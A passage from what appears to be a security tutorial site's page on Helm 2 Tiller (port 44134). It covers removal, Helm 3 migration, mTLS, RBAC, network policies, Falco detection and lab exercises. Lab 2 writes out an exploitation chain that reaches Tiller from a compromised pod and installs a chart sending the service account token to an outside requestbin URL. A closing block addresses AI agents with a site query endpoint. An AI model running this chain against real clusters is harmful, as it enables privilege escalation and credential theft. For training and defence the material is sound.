kind: Service
metadata:
  name: monitoring-dashboard
  namespace: kube-system
spec:
  type: LoadBalancer
  ports:
    - port: 8080
      targetPort: 8080
  selector:
    app: monitoring
```

Access via: `http://<external-ip>:8080`

***

## Defense & Mitigation&#x20;

#### 1. Immediate Actions

**If Tiller is Discovered:**

```bash
# Delete Tiller deployment
kubectl delete deployment tiller-deploy -n kube-system

# Delete Tiller service
kubectl delete service tiller-deploy -n kube-system

# Delete service account
kubectl delete serviceaccount tiller -n kube-system

# Delete cluster role binding
kubectl delete clusterrolebinding tiller

# Verify deletion
kubectl get all -n kube-system | grep tiller
```

#### 2. Upgrade to Helm 3

**Migration Process:**

```bash
# Install Helm 3
curl https://raw.githubusercontent.com/helm/helm/main/scripts/get-helm-3 | bash

# Install 2to3 plugin
helm3 plugin install https://github.com/helm/helm-2to3

# Migrate configuration
helm3 2to3 move config

# Migrate releases
helm3 2to3 convert <release-name>

# Cleanup Helm 2
helm3 2to3 cleanup
```

**Helm 3 Advantages:**

* No Tiller component
* Uses user's kubectl credentials and RBAC
* Namespaced releases
* Three-way strategic merge patches
* Chart dependencies improved

#### 3. Securing Helm 2 (if migration not possible)

**Enable mTLS Authentication:**

```bash
# Generate CA
openssl genrsa -out ca.key 2048
openssl req -x509 -new -nodes -key ca.key -sha256 -days 1024 -out ca.crt

# Generate Tiller certificate
openssl genrsa -out tiller.key 2048
openssl req -new -key tiller.key -out tiller.csr
openssl x509 -req -in tiller.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out tiller.crt -days 365

# Install Tiller with TLS
helm init \
  --service-account tiller \
  --tiller-tls \
  --tiller-tls-cert ./tiller.crt \
  --tiller-tls-key ./tiller.key \
  --tiller-tls-verify \
  --tls-ca-cert ca.crt

# Client must use TLS
helm list --tls
```

**Restrict Tiller Permissions:**

```yaml
# Create namespace-specific role
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: tiller-role
  namespace: my-namespace
rules:
  - apiGroups: ["", "apps", "extensions"]
    resources: ["*"]
    verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: tiller-binding
  namespace: my-namespace
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: tiller-role
subjects:
  - kind: ServiceAccount
    name: tiller
    namespace: my-namespace
```

#### 4. Network Security

**Implement Network Policies:**

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-tiller
  namespace: kube-system
spec:
  podSelector:
    matchLabels:
      app: helm
      name: tiller
  policyTypes:
    - Ingress
  ingress:
    - from:
      # Only allow from specific namespaces
      - namespaceSelector:
          matchLabels:
            trusted: "true"
      ports:
        - protocol: TCP
          port: 44134
```

**Block Port 44134 at Firewall:**

```bash
# iptables
iptables -A INPUT -p tcp --dport 44134 -j DROP

# GCP
gcloud compute firewall-rules create deny-tiller \
  --direction=INGRESS \
  --action=DENY \
  --rules=tcp:44134

# AWS
aws ec2 authorize-security-group-ingress \
  --group-id sg-xxxxx \
  --ip-permissions IpProtocol=tcp,FromPort=44134,ToPort=44134 \
  --source-group sg-xxxxx \
  --protocol tcp
```

#### 5. Detection & Monitoring

**Audit Helm Operations:**

```yaml
# Kubernetes audit policy
apiVersion: audit.k8s.io/v1
kind: Policy
rules:
  - level: RequestResponse
    verbs: ["create", "update", "patch", "delete"]
    resources:
      - group: ""
        resources: ["pods", "services"]
    namespaces: ["kube-system"]
```

**Monitor Tiller Connections:**

```bash
# Watch Tiller pod logs
kubectl logs -f deployment/tiller-deploy -n kube-system

# Monitor connections
kubectl exec -n kube-system <tiller-pod> -- netstat -an | grep 44134

# Prometheus query for Tiller metrics
sum(rate(tiller_requests_total[5m])) by (verb)
```

**Falco Rules for Tiller Exploitation:**

```yaml
- rule: Helm Chart Installed with Elevated Privileges
  desc: Detect Helm charts creating cluster-admin resources
  condition: >
    k8s.verb=create and
    k8s.target.namespace=kube-system and
    (k8s.target.resource=clusterrolebinding or k8s.target.resource=clusterrole) and
    k8s.req.clusterrolebinding.role=cluster-admin
  output: >
    Privileged Helm chart installed
    (user=%ka.user.name ns=%ka.target.namespace resource=%ka.target.resource)
  priority: CRITICAL
```

#### 6. Best Practices

**Security Checklist:**

* \[ ] **Upgrade to Helm 3** (no Tiller)
* \[ ] **If Helm 2 required**, enable mTLS
* \[ ] **Restrict RBAC permissions** (no cluster-admin)
* \[ ] **Implement NetworkPolicies**
* \[ ] **Enable audit logging**
* \[ ] **Monitor Tiller activity**
* \[ ] **Regular security scans**
* \[ ] **Namespace isolation**
* \[ ] **Pod Security Policies/Pod Security Standards**
* \[ ] **Regular reviews of ClusterRoleBindings**

***

## Practical Lab Scenarios&#x20;

#### Lab 1: Setting Up Vulnerable Environment

```bash
# Create test cluster (GKE example)
gcloud container clusters create vuln-cluster \
  --zone us-central1-a \
  --num-nodes 3

# Get credentials
gcloud container clusters get-credentials vuln-cluster

# Install Helm 2 with vulnerable config
kubectl create serviceaccount tiller -n kube-system

kubectl create clusterrolebinding tiller \
  --clusterrole=cluster-admin \
  --serviceaccount=kube-system:tiller

helm init --service-account tiller

# Verify Tiller is running
kubectl get pods -n kube-system | grep tiller
```

#### Lab 2: Exploitation Exercise

```bash
# Deploy victim application
helm install stable/wordpress --name myblog

# Compromise pod (simulate)
POD=$(kubectl get pods -l app=wordpress -o jsonpath='{.items[0].metadata.name}')
kubectl exec -it $POD -- /bin/bash

# Inside pod: Discover and exploit Tiller
export HELM_VERSION=v2.17.0
curl -L "https://get.helm.sh/helm-${HELM_VERSION}-linux-amd64.tar.gz" | \
  tar xz --strip-components=1 -C /tmp linux-amd64/helm

export HELM_HOST=tiller-deploy.kube-system:44134
export HELM_HOME=/tmp/helmhome
/tmp/helm init --client-only

# Verify access
/tmp/helm list

# Deploy privilege escalation
git clone https://github.com/ropnop/pentest_charts
/tmp/helm install pentest_charts/charts/exfil_sa_token \
  --name pwn \
  --set serviceAccountName=tiller \
  --set exfilURL=http://requestbin.net/xxxxx
```

#### Lab 3: Detection Exercise

```bash
# Enable audit logging
# (Edit API server manifest)

# Deploy Falco
helm install falco falcosecurity/falco \
  --set falco.grpc.enabled=true

# Monitor for Tiller abuse
kubectl logs -f daemonset/falco -n falco

# Generate alert by deploying malicious chart
helm install ./malicious-chart --name test
```

#### Lab 4: Remediation Exercise

```bash
# Remove Tiller
kubectl delete deployment tiller-deploy -n kube-system
kubectl delete service tiller-deploy -n kube-system
kubectl delete serviceaccount tiller -n kube-system

# Migrate to Helm 3
helm3 plugin install https://github.com/helm/helm-2to3
helm3 2to3 migrate

# Verify no Tiller remains
kubectl get all -n kube-system | grep -i tiller
```

***

### Conclusion

Helm Tiller represents a critical security vulnerability in Kubernetes environments. The combination of unauthenticated gRPC access, cluster-admin privileges, and network accessibility creates a perfect storm for privilege escalation attacks. While Helm 3 has eliminated Tiller, legacy deployments remain widespread and vulnerable.

**Key Takeaways:**

1. **Tiller = Instant Cluster Admin** - Any pod compromise leads to full cluster takeover
2. **No Authentication = No Security** - Default configs are completely insecure
3. **Upgrade to Helm 3** - Eliminates the entire attack surface
4. **Defense in Depth** - Network policies, RBAC, and monitoring are essential
5. **Regular Audits** - Check for Tiller in all Kubernetes clusters

**For Pentesters:**

* Always check for Tiller (port 44134) in Kubernetes assessments
* Use ropnop's pentest\_charts for efficient exploitation
* Document the complete attack chain: discovery → exploitation → privilege escalation
* Demonstrate business impact with realistic attack scenarios

**For Defenders:**

* Eliminate Tiller immediately if found
* Migrate to Helm 3 as soon as possible
* If Helm 2 required, implement mTLS and RBAC restrictions
* Monitor for suspicious chart deployments
* Regular security assessments of Kubernetes clusters

***

### Additional Resources

#### Tools

* [ropnop/pentest\_charts](https://github.com/ropnop/pentest_charts) - Helm charts for exploitation
* [munnerz/helmsploit](https://github.com/munnerz/helmsploit) - Simple privilege escalation demo
* [Helm 2to3 Plugin](https://github.com/helm/helm-2to3) - Migration tool

#### Research & Writeups

* [Attacking Default Installs of Helm on Kubernetes](https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/) - ropnop
* [Helm Tiller Security](https://engineering.bitnami.com/articles/helm-security.html) - Bitnami
* [Securing Helm](https://helm.sh/docs/topics/securing_installation/) - Official Documentation

{% hint style="success" %}
Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com/)

<details>

<summary>Support VeryLazyTech 🎉</summary>

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚

</details>
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.verylazytech.com/tiller-helm-port-44134.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
